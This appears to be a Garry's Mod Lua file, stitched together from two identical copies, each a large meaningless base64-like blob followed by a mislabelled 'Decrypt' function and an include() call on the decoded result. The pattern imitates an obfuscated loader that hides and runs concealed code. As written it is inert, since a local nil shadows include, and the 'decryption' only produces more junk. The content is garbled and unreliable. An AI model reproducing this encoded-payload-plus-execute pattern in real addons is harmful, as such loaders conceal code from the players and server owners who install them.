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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil

